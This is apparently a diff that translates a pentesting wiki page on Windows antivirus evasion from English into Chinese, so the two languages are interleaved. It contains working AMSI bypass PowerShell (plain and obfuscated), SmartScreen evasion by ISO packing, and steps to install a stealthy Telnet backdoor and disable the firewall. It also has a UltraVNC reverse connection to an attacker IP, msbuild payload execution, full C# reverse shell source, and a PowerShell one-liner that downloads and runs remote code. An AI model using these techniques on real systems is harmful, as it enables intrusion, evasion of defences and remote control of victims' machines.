-Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case, powershell.exe
+注意它是如何在前面加上 `amsi:` 然后是脚本运行的可执行文件的路径，在这种情况下是powershell.exe。
 
-We didn't drop any file to disk, but still got caught in-memory because of AMSI.
+我们没有将任何文件写入磁盘，但仍然因为AMSI在内存中被捕获。
 
-There are a couple of ways to get around AMSI:
+有几种方法可以绕过AMSI：
 
-- **Obfuscation**
+- **混淆**
 
-Since AMSI mainly works with static detections, therefore, modifying the scripts you try to load can be a good way for evading detection.
+由于AMSI主要依赖静态检测，因此修改你尝试加载的脚本可能是规避检测的好方法。
 
-However, AMSI has the capability of unobfuscating scripts even if it has multiple layers, so obfuscation could be a bad option depending on how it's done. This makes it not-so-straightforward to evade. Although, sometimes, all you need to do is change a couple of variable names and you'll be good, so it depends on how much something has been flagged.
+然而，AMSI有能力解混淆脚本，即使它有多层，因此混淆可能是一个糟糕的选择，这取决于它的实现方式。这使得规避变得不那么简单。尽管有时，你所需要做的只是更改几个变量名称，你就可以成功，因此这取决于某个内容被标记的程度。
 
-- **AMSI Bypass**
+- **AMSI绕过**
 
-Since AMSI is implemented by loading a DLL into the powershell (also cscript.exe, wscript.exe, etc.) process, it's possible to tamper with it easily even running as an unprivileged user. Due to this flaw in the implementation of AMSI, researchers have found multiple ways to evade AMSI scanning.
+由于AMSI是通过将DLL加载到powershell（也包括cscript.exe、wscript.exe等）进程中来实现的，因此即使以非特权用户身份运行，也可以轻松篡改它。由于AMSI实现中的这个缺陷，研究人员发现了多种规避AMSI扫描的方法。
 
-**Forcing an Error**
-
-Forcing the AMSI initialization to fail (amsiInitFailed) will result that no scan will be initiated for the current process. Originally this was disclosed by [Matt Graeber](https://twitter.com/mattifestation) and Microsoft has developed a signature to prevent wider usage.
+**强制错误**
 
+强制AMSI初始化失败（amsiInitFailed）将导致当前进程不会启动扫描。最初这是由[Matt Graeber](https://twitter.com/mattifestation)披露的，微软已经开发了一种签名来防止更广泛的使用。
 ```powershell
 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
 ```
+只需一行 PowerShell 代码就可以使当前 PowerShell 进程无法使用 AMSI。 当然，这一行已经被 AMSI 本身标记，因此需要进行一些修改才能使用此技术。
 
-All it took was one line of powershell code to render AMSI unusable for the current powershell process. This line has of course been flagged by AMSI itself, so some modification is needed in order to use this technique.
-
-Here is a modified AMSI bypass I took from this [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db).
-
+这是我从这个 [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db) 中获取的修改过的 AMSI 绕过方法。
 ```powershell
 Try{#Ams1 bypass technic nº 2
-      $Xdatabase = 'Utils';$Homedrive = 'si'
-      $ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
-      $DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
-      $fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
-      $CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
-      $Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
-      $SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
-      $Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
-      $Spotfix.SetValue($null,$true)
-   }Catch{Throw $_}
+$Xdatabase = 'Utils';$Homedrive = 'si'
+$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
+$DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
+$fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
+$CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
+$Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
+$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
+$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
+$Spotfix.SetValue($null,$true)
+}Catch{Throw $_}
 ```
+请记住，这篇文章发布后可能会被标记，因此如果你的计划是保持不被检测，就不应该发布任何代码。
 
-Keep in mind, that this will probably get flagged once this post comes out, so you should not publish any code if your plan is staying undetected.
+**内存补丁**
 
-**Memory Patching**
-
-This technique was initially discovered by [@RastaMouse](https://twitter.com/_RastaMouse/) and it involves finding address for the "AmsiScanBuffer" function in amsi.dll (responsible for scanning the user-supplied input) and overwriting it with instructions to return the code for E_INVALIDARG, this way, the result of the actual scan will return 0, which is interpreted as a clean result.
+该技术最初由 [@RastaMouse](https://twitter.com/_RastaMouse/) 发现，涉及在 amsi.dll 中找到 "AmsiScanBuffer" 函数的地址（负责扫描用户提供的输入），并用返回 E_INVALIDARG 代码的指令覆盖它，这样，实际扫描的结果将返回 0，这被解释为干净的结果。
 
 > [!NOTE]
-> Please read [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) for a more detailed explanation.
+> 请阅读 [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) 以获取更详细的解释。
 
-There are also many other techniques used to bypass AMSI with powershell, check out [**this page**](basic-powershell-for-pentesters/#amsi-bypass) and [this repo](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) to learn more about them.
+还有许多其他技术可以通过 PowerShell 绕过 AMSI，查看 [**此页面**](basic-powershell-for-pentesters/#amsi-bypass) 和 [此仓库](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) 以了解更多信息。
 
-Or this script taht via memory patching will patch each new Powersh
+或者这个脚本通过内存补丁将补丁应用于每个新的 PowerShell。
 
-## Obfuscation
+## 混淆
 
-There are several tools that can be used to **obfuscate C# clear-text code**, generate **metaprogramming templates** to compile binaries or **obfuscate compiled binaries** such as:
+有几种工具可以用来 **混淆 C# 明文代码**，生成 **元编程模板** 以编译二进制文件或 **混淆编译后的二进制文件**，例如：
 
-- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# obfuscator**
-- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): The aim of this project is to provide an open-source fork of the [LLVM](http://www.llvm.org/) compilation suite able to provide increased software security through [code obfuscation](<http://en.wikipedia.org/wiki/Obfuscation_(software)>) and tamper-proofing.
-- [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator demonstates how to use `C++11/14` language to generate, at compile time, obfuscated code without using any external tool and without modifying the compiler.
-- [**obfy**](https://github.com/fritzone/obfy): Add a layer of obfuscated operations generated by the C++ template metaprogramming framework which will make the life of the person wanting to crack the application a little bit harder.
-- [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz is a x64 binary obfuscator that is able to obfuscate various different pe files including: .exe, .dll, .sys
-- [**metame**](https://github.com/a0rtega/metame): Metame is a simple metamorphic code engine for arbitrary executables.
-- [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator is a fine-grained code obfuscation framework for LLVM-supported languages using ROP (return-oriented programming). ROPfuscator obfuscates a program at the assembly code level by transforming regular instructions into ROP chains, thwarting our natural conception of normal control flow.
-- [**Nimcrypt**](https://github.com/icyguider/nimcrypt): Nimcrypt is a .NET PE Crypter written in Nim
-- [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor is able to convert existing EXE/DLL into shellcode and then load them
+- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# 混淆器**
+- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): 该项目的目的是提供一个开源的 [LLVM](http://www.llvm.org/) 编译套件的分支，能够通过 [代码混淆](<http://en.wikipedia.org/wiki/Obfuscation_(software)>) 和防篡改提供增强的软件安全性。
+- [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator 演示如何使用 `C++11/14` 语言在编译时生成混淆代码，而不使用任何外部工具且不修改编译器。
+- [**obfy**](https://github.com/fritzone/obfy): 添加一层由 C++ 模板元编程框架生成的混淆操作，这将使想要破解应用程序的人稍微困难一些。
+- [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz 是一个 x64 二进制混淆器，能够混淆各种不同的 pe 文件，包括：.exe, .dll, .sys
+- [**metame**](https://github.com/a0rtega/metame): Metame 是一个简单的变形代码引擎，用于任意可执行文件。
+- [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator 是一个细粒度的代码混淆框架，适用于使用 ROP（面向返回的编程）的 LLVM 支持语言。ROPfuscator 通过将常规指令转换为 ROP 链，在汇编代码级别混淆程序，阻碍我们对正常控制流的自然概念。
+- [**Nimcrypt**](https://github.com/icyguider/nimcrypt): Nimcrypt 是一个用 Nim 编写的 .NET PE 加密器。
+- [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor 能够将现有的 EXE/DLL 转换为 shellcode，然后加载它们。
 
 ## SmartScreen & MoTW
 
-You may have seen this screen when downloading some executables from the internet and executing them.
+你可能在从互联网下载某些可执行文件并执行它们时见过这个屏幕。
 
-Microsoft Defender SmartScreen is a security mechanism intended to protect the end user against running potentially malicious applications.
+Microsoft Defender SmartScreen 是一种安全机制，旨在保护最终用户免受运行潜在恶意应用程序的影响。
 
 <figure><img src="../images/image (664).png" alt=""><figcaption></figcaption></figure>
 
-SmartScreen mainly works with a reputation-based approach, meaning that uncommonly download applications will trigger SmartScreen thus alerting and preventing the end user from executing the file (although the file can still be executed by clicking More Info -> Run anyway).
+SmartScreen 主要采用基于声誉的方法，这意味着不常下载的应用程序将触发 SmartScreen，从而警告并阻止最终用户执行该文件（尽管可以通过点击更多信息 -> 无论如何运行来执行该文件）。
 
-**MoTW** (Mark of The Web) is an [NTFS Alternate Data Stream](<https://en.wikipedia.org/wiki/NTFS#Alternate_data_stream_(ADS)>) with the name of Zone.Identifier which is automatically created upon download files from the internet, along with the URL it was downloaded from.
+**MoTW**（网络标记）是一个 [NTFS 备用数据流](<https://en.wikipedia.org/wiki/NTFS#Alternate_data_stream_(ADS)>)，其名称为 Zone.Identifier，下载来自互联网的文件时会自动创建，并附带下载的 URL。
 
-<figure><img src="../images/image (237).png" alt=""><figcaption><p>Checking the Zone.Identifier ADS for a file downloaded from the internet.</p></figcaption></figure>
+<figure><img src="../images/image (237).png" alt=""><figcaption><p>检查从互联网下载的文件的 Zone.Identifier ADS。</p></figcaption></figure>
 
 > [!NOTE]
-> It's important to note that executables signed with a **trusted** signing certificate **won't trigger SmartScreen**.
+> 重要的是要注意，使用 **受信任** 签名证书签名的可执行文件 **不会触发 SmartScreen**。
 
-A very effective way to prevent your payloads from getting the Mark of The Web is by packaging them inside some sort of container like an ISO. This happens because Mark-of-the-Web (MOTW) **cannot** be applied to **non NTFS** volumes.
+防止你的有效载荷获得网络标记的一个非常有效的方法是将它们打包在某种容器中，例如 ISO。这是因为网络标记（MOTW） **不能** 应用于 **非 NTFS** 卷。
 
 <figure><img src="../images/image (640).png" alt=""><figcaption></figcaption></figure>
 
-[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) is a tool that packages payloads into output containers to evade Mark-of-the-Web.
-
-Example usage:
+[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) 是一个将有效载荷打包到输出容器中的工具，以规避网络标记。
 
+示例用法：
 ```powershell
 PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso
 
 +      o     +              o   +      o     +              o
-    +             o     +           +             o     +         +
-    o  +           +        +           o  +           +          o
++             o     +           +             o     +         +
+o  +           +        +           o  +           +          o
 -_-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-_-_-_-_-_-_-_,------,      o
-   :: PACK MY PAYLOAD (1.1.0)       -_-_-_-_-_-_-|   /\_/\
-   for all your container cravings   -_-_-_-_-_-~|__( ^ .^)  +    +
+:: PACK MY PAYLOAD (1.1.0)       -_-_-_-_-_-_-|   /\_/\
+for all your container cravings   -_-_-_-_-_-~|__( ^ .^)  +    +
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-__-_-_-_-_-_-_-''  ''
 +      o         o   +       o       +      o         o   +       o
 +      o            +      o    ~   Mariusz Banach / mgeeky    o
 o      ~     +           ~          <mb [at] binary-offensive.com>
-    o           +                         o           +           +
+o           +                         o           +           +
 
 [.] Packaging input file to output .iso (iso)...
 Burning file onto ISO:
-    Adding file: /TotallyLegitApp.exe
+Adding file: /TotallyLegitApp.exe
 
 [+] Generated file written to (size: 3420160): container.iso
 ```
-
-Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using [PackMyPayload](https://github.com/mgeeky/PackMyPayload/)
+这里是一个通过将有效负载打包在ISO文件中来绕过SmartScreen的演示，使用[PackMyPayload](https://github.com/mgeeky/PackMyPayload/)
 
 <figure><img src="../images/packmypayload_demo.gif" alt=""><figcaption></figcaption></figure>
 
-## C# Assembly Reflection
+## C#程序集反射
 
-Loading C# binaries in memory has been known for quite some time and it's still a very great way for running your post-exploitation tools without getting caught by AV.
+在内存中加载C#二进制文件已经被知道了一段时间，这仍然是运行后渗透工具而不被AV捕获的非常好方法。
 
-Since the payload will get loaded directly into memory without touching disk, we will only have to worry about patching AMSI for the whole process.
+由于有效负载将直接加载到内存中而不接触磁盘，我们只需担心在整个过程中修补AMSI。
 
-Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) already provide the ability to execute C# assemblies directly in memory, but there are different ways of doing so:
+大多数C2框架（sliver、Covenant、metasploit、CobaltStrike、Havoc等）已经提供了直接在内存中执行C#程序集的能力，但有不同的方法来做到这一点：
 
 - **Fork\&Run**
 
-It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
+这涉及到**生成一个新的牺牲进程**，将你的后渗透恶意代码注入到该新进程中，执行你的恶意代码，完成后杀死新进程。这有其优点和缺点。Fork和运行方法的好处在于执行发生在我们的Beacon植入进程**之外**。这意味着如果我们的后渗透操作中的某些事情出错或被捕获，我们的**植入存活的机会会更大**。缺点是你有**更大的机会**被**行为检测**捕获。
 
 <figure><img src="../images/image (215).png" alt=""><figcaption></figcaption></figure>
 
 - **Inline**
 
-It's about injecting the post-exploitation malicious code **into its own process**. This way, you can avoid having to create a new process and getting it scanned by AV, but the drawback is that if something goes wrong with the execution of your payload, there's a **much greater chance** of **losing your beacon** as it could crash.
+这涉及将后渗透恶意代码**注入到其自身进程中**。这样，你可以避免创建新进程并让其被AV扫描，但缺点是如果你的有效负载执行出现问题，**失去你的beacon的机会会更大**，因为它可能会崩溃。
 
 <figure><img src="../images/image (1136).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> If you want to read more about C# Assembly loading, please check out this article [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) and their InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
+> 如果你想了解更多关于C#程序集加载的信息，请查看这篇文章[https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/)及其InlineExecute-Assembly BOF（[https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly)）
 
-You can also load C# Assemblies **from PowerShell**, check out [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) and [S3cur3th1sSh1t's video](https://www.youtube.com/watch?v=oe11Q-3Akuk).
+你还可以从PowerShell加载C#程序集，查看[Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader)和[S3cur3th1sSh1t的视频](https://www.youtube.com/watch?v=oe11Q-3Akuk)。
 
-## Using Other Programming Languages
+## 使用其他编程语言
 
-As proposed in [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins), it's possible to execute malicious code using other languages by giving the compromised machine access **to the interpreter environment installed on the Attacker Controlled SMB share**.
+正如在[**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins)中提出的，可以通过让被攻陷的机器访问**安装在攻击者控制的SMB共享上的解释器环境**来使用其他语言执行恶意代码。
 
-By allowing access to the Interpreter Binaries and the environment on the SMB share you can **execute arbitrary code in these languages within memory** of the compromised machine.
+通过允许访问SMB共享上的解释器二进制文件和环境，你可以**在被攻陷机器的内存中执行这些语言的任意代码**。
 
-The repo indicates: Defender still scans the scripts but by utilising Go, Java, PHP etc we have **more flexibility to bypass static signatures**. Testing with random un-obfuscated reverse shell scripts in these languages has proved successful.
+该仓库指出：Defender仍然会扫描脚本，但通过利用Go、Java、PHP等，我们有**更多的灵活性来绕过静态签名**。使用这些语言中的随机未混淆反向Shell脚本进行测试已证明成功。
 
-## Advanced Evasion
+## 高级规避
 
-Evasion is a very complicated topic, sometimes you have to take into account many different sources of telemetry in just one system, so it's pretty much impossible to stay completely undetected in mature environments.
+规避是一个非常复杂的话题，有时你必须考虑一个系统中许多不同的遥测来源，因此在成熟环境中完全不被检测几乎是不可能的。
 
-Every environment you go against will have their own strengths and weaknesses.
+你所面对的每个环境都有其自身的优缺点。
 
-I highly encourage you go watch this talk from [@ATTL4S](https://twitter.com/DaniLJ94), to get a foothold into more Advanced Evasion techniques.
+我强烈建议你观看[@ATTL4S](https://twitter.com/DaniLJ94)的这场演讲，以了解更多高级规避技术。
 
 {% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
 
-his is also another great talk from [@mariuszbit](https://twitter.com/mariuszbit) about Evasion in Depth.
+这也是[@mariuszbit](https://twitter.com/mariuszbit)关于深入规避的另一场精彩演讲。
 
 {% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}
 
-## **Old Techniques**
+## **旧技术**
 
-### **Check which parts Defender finds as malicious**
+### **检查Defender发现的恶意部分**
 
-You can use [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) which will **remove parts of the binary** until it **finds out which part Defender** is finding as malicious and split it to you.\
-Another tool doing the **same thing is** [**avred**](https://github.com/dobin/avred) with an open web offering the service in [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
+你可以使用[**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck)，它将**删除二进制文件的部分**，直到**找出Defender**发现的恶意部分并将其分离给你。\
+另一个做**同样事情的工具是**[**avred**](https://github.com/dobin/avred)，它在[**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)提供开放的网络服务。
 
-### **Telnet Server**
-
-Until Windows10, all Windows came with a **Telnet server** that you could install (as administrator) doing:
+### **Telnet服务器**
 
+直到Windows 10，所有Windows都附带一个**Telnet服务器**，你可以通过以下方式安装（作为管理员）：
 ```bash
 pkgmgr /iu:"TelnetServer" /quiet
 ```
-
-Make it **start** when the system is started and **run** it now:
-
+使其在系统启动时**启动**并**立即运行**：
 ```bash
 sc config TlntSVR start= auto obj= localsystem
 ```
-
-**Change telnet port** (stealth) and disable firewall:
-
+**更改telnet端口** (隐蔽) 并禁用防火墙:
 ```
 tlntadmn config port=80
 netsh advfirewall set allprofiles state off
 ```
-
 ### UltraVNC
 
-Download it from: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html) (you want the bin downloads, not the setup)
+从以下地址下载: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html)（你需要的是二进制下载，而不是安装程序）
 
-**ON THE HOST**: Execute _**winvnc.exe**_ and configure the server:
+**在主机上**: 执行 _**winvnc.exe**_ 并配置服务器:
 
-- Enable the option _Disable TrayIcon_
-- Set a password in _VNC Password_
-- Set a password in _View-Only Password_
+- 启用选项 _Disable TrayIcon_
+- 在 _VNC Password_ 中设置密码
+- 在 _View-Only Password_ 中设置密码
 
-Then, move the binary _**winvnc.exe**_ and **newly** created file _**UltraVNC.ini**_ inside the **victim**
+然后，将二进制文件 _**winvnc.exe**_ 和 **新创建的** 文件 _**UltraVNC.ini**_ 移动到 **受害者** 机器中
 
-#### **Reverse connection**
+#### **反向连接**
 
-The **attacker** should **execute inside** his **host** the binary `vncviewer.exe -listen 5900` so it will be **prepared** to catch a reverse **VNC connection**. Then, inside the **victim**: Start the winvnc daemon `winvnc.exe -run` and run `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
+**攻击者**应在其 **主机** 中执行二进制文件 `vncviewer.exe -listen 5900`，以便 **准备** 捕获反向 **VNC 连接**。然后，在 **受害者** 中: 启动 winvnc 守护进程 `winvnc.exe -run` 并运行 `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
 
-**WARNING:** To maintain stealth you must not do a few things
+**警告:** 为了保持隐蔽性，你必须避免以下几件事
 
-- Don't start `winvnc` if it's already running or you'll trigger a [popup](https://i.imgur.com/1SROTTl.png). check if it's running with `tasklist | findstr winvnc`
-- Don't start `winvnc` without `UltraVNC.ini` in the same directory or it will cause [the config window](https://i.imgur.com/rfMQWcf.png) to open
-- Don't run `winvnc -h` for help or you'll trigger a [popup](https://i.imgur.com/oc18wcu.png)
+- 如果 `winvnc` 已经在运行，不要再次启动它，否则会触发一个 [弹出窗口](https://i.imgur.com/1SROTTl.png)。使用 `tasklist | findstr winvnc` 检查它是否在运行
+- 如果没有 `UltraVNC.ini` 在同一目录中，不要启动 `winvnc`，否则会导致 [配置窗口](https://i.imgur.com/rfMQWcf.png) 打开
+- 不要运行 `winvnc -h` 获取帮助，否则会触发一个 [弹出窗口](https://i.imgur.com/oc18wcu.png)
 
 ### GreatSCT
 
-Download it from: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
-
+从以下地址下载: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
 ```
 git clone https://github.com/GreatSCT/GreatSCT.git
 cd GreatSCT/setup/
@@ -385,9 +364,7 @@ cd GreatSCT/setup/
 cd ..
 ./GreatSCT.py
 ```
-
-Inside GreatSCT:
-
+在 GreatSCT 内部：
 ```
 use 1
 list #Listing available payloads
@@ -397,29 +374,23 @@ sel lport 4444
 generate #payload is the default name
 #This will generate a meterpreter xml and a rcc file for msfconsole
 ```
-
-Now **start the lister** with `msfconsole -r file.rc` and **execute** the **xml payload** with:
-
+现在 **启动 lister** 使用 `msfconsole -r file.rc` 并 **执行** **xml payload** 使用：
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
 ```
+**当前的防御者会非常快速地终止进程。**
 
-**Current defender will terminate the process very fast.**
-
-### Compiling our own reverse shell
+### 编译我们自己的反向 shell
 
 https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
 
-#### First C# Revershell
-
-Compile it with:
+#### 第一个 C# 反向 shell
 
+使用以下命令编译：
 ```
 c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
 ```
-
-Use it with:
-
+与之一起使用：
 ```
 back.exe <ATTACKER_IP> <PORT>
 ```
@@ -438,77 +409,69 @@ using System.Net.Sockets;
 
 namespace ConnectBack
 {
-	public class Program
-	{
-		static StreamWriter streamWriter;
+public class Program
+{
+static StreamWriter streamWriter;
 
-		public static void Main(string[] args)
-		{
-			using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
-			{
-				using(Stream stream = client.GetStream())
-				{
-					using(StreamReader rdr = new StreamReader(stream))
-					{
-						streamWriter = new StreamWriter(stream);
+public static void Main(string[] args)
+{
+using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
+{
+using(Stream stream = client.GetStream())
+{
+using(StreamReader rdr = new StreamReader(stream))
+{
+streamWriter = new StreamWriter(stream);
 
-						StringBuilder strInput = new StringBuilder();
+StringBuilder strInput = new StringBuilder();
 
-						Process p = new Process();
-						p.StartInfo.FileName = "cmd.exe";
-						p.StartInfo.CreateNoWindow = true;
-						p.StartInfo.UseShellExecute = false;
-						p.StartInfo.RedirectStandardOutput = true;
-						p.StartInfo.RedirectStandardInput = true;
-						p.StartInfo.RedirectStandardError = true;
-						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
-						p.Start();
-						p.BeginOutputReadLine();
+Process p = new Process();
+p.StartInfo.FileName = "cmd.exe";
+p.StartInfo.CreateNoWindow = true;
+p.StartInfo.UseShellExecute = false;
+p.StartInfo.RedirectStandardOutput = true;
+p.StartInfo.RedirectStandardInput = true;
+p.StartInfo.RedirectStandardError = true;
+p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
+p.Start();
+p.BeginOutputReadLine();
 
-						while(true)
-						{
-							strInput.Append(rdr.ReadLine());
-							//strInput.Append("\n");
-							p.StandardInput.WriteLine(strInput);
-							strInput.Remove(0, strInput.Length);
-						}
-					}
-				}
-			}
-		}
+while(true)
+{
+strInput.Append(rdr.ReadLine());
+//strInput.Append("\n");
+p.StandardInput.WriteLine(strInput);
+strInput.Remove(0, strInput.Length);
+}
+}
+}
+}
+}
 
-		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
-        {
-            StringBuilder strOutput = new StringBuilder();
+private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
+{
+StringBuilder strOutput = new StringBuilder();
 
-            if (!String.IsNullOrEmpty(outLine.Data))
-            {
-                try
-                {
-                    strOutput.Append(outLine.Data);
-                    streamWriter.WriteLine(strOutput);
-                    streamWriter.Flush();
-                }
-                catch (Exception err) { }
-            }
-        }
+if (!String.IsNullOrEmpty(outLine.Data))
+{
+try
+{
+strOutput.Append(outLine.Data);
+streamWriter.WriteLine(strOutput);
+streamWriter.Flush();
+}
+catch (Exception err) { }
+}
+}
 
-	}
+}
 }
 ```
-
-### C# using compiler
-
+### C# 使用编译器
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
 ```
-
-[REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066](https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066)
-
-[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)
-
-Automatic download and execution:
-
+自动下载和执行：
 ```csharp
 64bit:
 powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
@@ -516,19 +479,16 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g
 32bit:
 powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
 ```
-
 {% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
 
-C# obfuscators list: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
+C# 混淆器列表: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
 
 ### C++
-
 ```
 sudo apt-get install mingw-w64
 
 i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
 ```
-
 - [https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp](https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp)
 - [https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/](https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/)
 - [https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf)
@@ -536,12 +496,11 @@ i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sec
